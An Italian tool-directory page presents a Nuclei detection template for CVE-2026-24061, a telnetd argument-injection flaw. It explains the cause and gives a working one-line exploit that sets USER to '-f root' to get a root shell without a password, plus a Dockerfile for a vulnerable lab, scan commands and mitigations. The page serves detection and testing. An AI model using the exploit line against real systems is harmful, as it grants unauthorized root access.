Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/mr-zapi/cve-2026-24061
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza di RetePenetration TestingApprendimento e Formazione
GitHubmr-zapi/cve-2026-24061

CVE-2026-24061

# Template Nuclei per il rilevamento di CVE-2026-24061, un'iniezione critica di argomenti telnet in GNU inetutils telnetd che consente accesso root non autenticato.

Vedi Repository
17 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-24061 - Telnet Argument Injection

Modello Nuclei per il rilevamento della vulnerabilità CVE-2026-24061 in GNU inetutils telnetd, che consente di ottenere accesso root senza autenticazione.

📋 Descrizione della vulnerabilità

CVE-2026-24061 è una vulnerabilità critica di argument injection in GNU inetutils telnetd che consente a un attaccante di ottenere una root shell senza conoscere la password.

Come funziona?

  1. Radice del problema: Nel 2015, in telnetd è stato aggiunto un nuovo modello di login con il parametro dinamico %U:
root@kitploit:~
   /usr/bin/login -p -h %h %?u{-f %u}{%U}
  1. Vulnerabilità: La variabile d'ambiente USER viene trasmessa tramite il protocollo telnet (RFC 1572 NEW-ENVIRON) e non viene sanificata prima della sostituzione nel comando.

  2. Sfruttamento: L'attaccante imposta USER="-f root" durante la connessione:

root@kitploit:~
   USER="-f root" telnet -a target.com 23
  1. Risultato: Il comando di login diventa:
root@kitploit:~
   /usr/bin/login -p -h hostname -f root

Il flag -f significa "skip authentication" → root senza password 💀

🎯 Versioni interessate

  • GNU inetutils telnetd con modello di login vulnerabile
  • Ad esempio: inetutils-telnetd 2:2.0-1+deb11u2
  • Sistemi in cui telnetd utilizza l'auto-login senza Kerberos

🚀 Utilizzo

Scansione di base

root@kitploit:~
nuclei -t cve-2026-24061.yaml -u target.com:23 -code

Obiettivi multipli

root@kitploit:~
nuclei -t cve-2026-24061.yaml -l targets.txt -code

🔬 Laboratorio di test

Per i test è possibile avviare un container Docker vulnerabile:

root@kitploit:~
FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y --no-install-recommends \
      inetutils-telnetd=2:2.0-1+deb11u2 \
      telnet && \
    rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
    sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

EXPOSE 23

CMD ["/usr/sbin/inetutils-inetd", "-d"]

Avvio:

root@kitploit:~
# Creare l'immagine
docker build -t vuln-telnetd .

# Avviare
docker run -d -p 2323:23 vuln-telnetd

# Verificare la vulnerabilità
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v

🛡️ Protezione

  1. Aggiornare inetutils alla versione corretta
  2. Disabilitare telnetd e utilizzare SSH
  3. Filtrare la porta 23 sul firewall
  4. Monitorare le connessioni telnet

📚 Riferimenti

  • NVD - CVE-2026-24061
  • SafeBreach Labs - Root Cause Analysis

📊 CVSS Score

9.8 / 10 - Critical

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • AV:N - Network (attacco di rete)
  • AC:L - Low complexity (facile da sfruttare)
  • PR:N - No privileges required (nessuna autenticazione richiesta)
  • UI:N - No user interaction (sfruttamento automatico)
  • C:H/I:H/A:H - Alto impatto su riservatezza, integrità e disponibilità

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza legali su sistemi per i quali si dispone di esplicita autorizzazione.

L'autore non è responsabile per l'uso improprio di questo modello.

👤 Autore

Creato da Mr.Zapi

Scarica lo strumento